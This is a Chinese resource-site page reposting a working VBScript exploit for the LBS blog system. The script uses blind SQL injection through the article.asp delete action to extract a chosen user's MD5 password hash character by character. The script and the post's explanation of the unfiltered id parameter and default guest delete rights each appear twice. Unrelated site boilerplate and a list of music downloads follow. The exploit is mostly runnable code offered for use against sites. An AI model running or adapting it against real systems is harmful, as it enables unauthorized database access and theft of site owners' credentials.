呵呵,只是证明下漏洞存在
exp如下,保存为vbs,自己下个程序测试自己吧
'From 剑心
'============================================================================
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid,articleid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.asp"
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
olbsXML.open "Post",OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
If InStr(GetPage,"deleted")<>0 Then
'"博客用户不存在或填写的资料有误" 为错误标志 ,返回此标志说明 猜解的 MD5 不正确
'如果得到 0000000000000000 的 MD5 值,请修改错误标志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage& vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub
漏洞说明:
src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......
过滤的是log_id,但是使用的确实id,呵呵 :)
然后呢?
class/article.asp中的代码
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}
上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!
function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵
exp如下,保存为vbs,自己下个程序测试自己吧
'From 剑心
'============================================================================
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid,articleid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.asp"
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
olbsXML.open "Post",OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
If InStr(GetPage,"deleted")<>0 Then
'"博客用户不存在或填写的资料有误" 为错误标志 ,返回此标志说明 猜解的 MD5 不正确
'如果得到 0000000000000000 的 MD5 值,请修改错误标志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage& vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub
漏洞说明:
src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......
过滤的是log_id,但是使用的确实id,呵呵 :)
然后呢?
class/article.asp中的代码
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}
上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!
function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵
华山资源网 Design By www.eoogi.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
华山资源网 Design By www.eoogi.com
暂无评论...
更新日志
2024年11月15日
2024年11月15日
- 群星《我们的歌第六季 第2期》[FLAC/分轨][385.16MB]
- 童丽《每一个晚上》[低速原抓WAV+CUE]
- 乌兰齐齐格《呼伦牧歌》[原抓WAV+CUE]
- 黄乙玲1988-无稳定的爱心肝乱糟糟[日本东芝1M版][WAV+CUE]
- 群星《我们的歌第六季 第3期》[320K/MP3][70.68MB]
- 群星《我们的歌第六季 第3期》[FLAC/分轨][369.48MB]
- 群星《燃!沙排少女 影视原声带》[320K/MP3][175.61MB]
- 乱斗海盗瞎6胜卡组推荐一览 深暗领域乱斗海盗瞎卡组分享
- 炉石传说乱斗6胜卡组分享一览 深暗领域乱斗6胜卡组代码推荐
- 炉石传说乱斗本周卡组合集 乱斗模式卡组最新推荐
- 佟妍.2015-七窍玲珑心【万马旦】【WAV+CUE】
- 叶振棠陈晓慧.1986-龙的心·俘虏你(2006复黑限量版)【永恒】【WAV+CUE】
- 陈慧琳.1998-爱我不爱(国)【福茂】【WAV+CUE】
- 咪咕快游豪礼放送,百元京东卡、海量欢乐豆就在咪咕咪粉节!
- 双11百吋大屏焕新“热”,海信AI画质电视成最大赢家